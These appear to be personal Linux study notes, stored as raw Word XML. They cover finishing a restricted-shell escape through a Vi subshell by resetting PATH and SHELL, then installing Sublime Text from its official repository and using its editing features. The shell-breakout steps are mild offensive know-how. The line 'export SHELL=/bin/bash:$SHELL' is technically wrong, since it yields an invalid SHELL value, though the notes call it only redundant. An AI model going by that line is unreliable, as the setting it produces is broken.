      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After this, I set the environment variables to bash to run all commands properly inside of the Vi subshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003474">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003475">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=/bin:/usr/bin:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003476">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="986"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Each colon separates the elements of the list. So we are setting the PATH variable equal to /bin, and also /usr/bin, and then $PATH, which is all of the old PATH variables. So, this is the same as prepending to the PATH list of variables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003477">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="986"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember we put a $ before an environment variable to access it and tell the terminal we want to work with the environment variable. If we just put PATH, then terminal won't know we are talking about the env variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003478">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="986"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This prepends /bin and /usr/bin to your existing $PATH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003479">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="986"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows you to run commands like cat, ls, cp, whoami, etc., without typing the full path (/bin/ls).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="986"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Without this, the shell might still only look in /home/tom/usr/bin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export SHELL=/bin/bash:$SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This sets your SHELL variable to Bash. While this isn't strictly necessary after breaking out, it's good hygiene.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="444"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You could also just do export SHELL=/bin/bash — appending $SHELL is redundant here unless you're stacking variables for some reason.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003480">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you are done:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003481">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1258"/>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3482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1258"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get out of the Vi subshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003483">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1258"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003484">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1258"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get out of Vi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003485">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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87">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xa11ookcye3i" w:id="474"/>
      <w:bookmarkEnd w:id="474"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sublime Text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003488">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003489">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I hate when one line is too long so it wraps onto the next line, so I learned how to disable word wrap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="298"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + SHIFT + P</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="298"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">word wrap: toggle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to toggle it on and off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId1141">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">How to download it</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get GPG Key which is used to ensure authenticity when you download 3rd party software</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003490">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo tee /etc/apt/keyrings/sublimehq-pub.asc &gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003491">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get stable version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003492">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -e 'Types: deb\nURIs: https://download.sublimetext.com/\nSuites: apt/stable/\nSigned-By: /etc/apt/keyrings/sublimehq-pub.asc' | sudo tee /etc/apt/sources.list.d/sublime-text.sources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003494">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:ind w:left="144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3495">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1047"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install sublime-text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003496">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003497">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003498">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Edit files using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003499">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1233"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subl name.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🌟 1. Multi-cursor editing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hold Ctrl (or Cmd on Mac) and click in multiple places — you can type or edit in many places at once.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or select a word, then press Ctrl+D repeatedly to select the next occurrences.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⚡ 2. Command Palette (Ctrl+Shift+P)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Press Ctrl+Shift+P to open the Command Palette — type anything (like "install package" or "indentation") to quickly run Sublime commands without navigating menus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🎨 3. Theme and color schemes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to Preferences &gt; Color Scheme and Preferences &gt; Theme to customize the look and feel — dark mode, light mode, syntax colors, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 4. Goto Anything (Ctrl+P)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Press Ctrl+P and start typing a filename, symbol, or line number (like config.py:@my_function) to jump anywhere instantly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">💡 5. Package Control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install Package Control (via the Command Palette) to get access to tons of plugins, like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
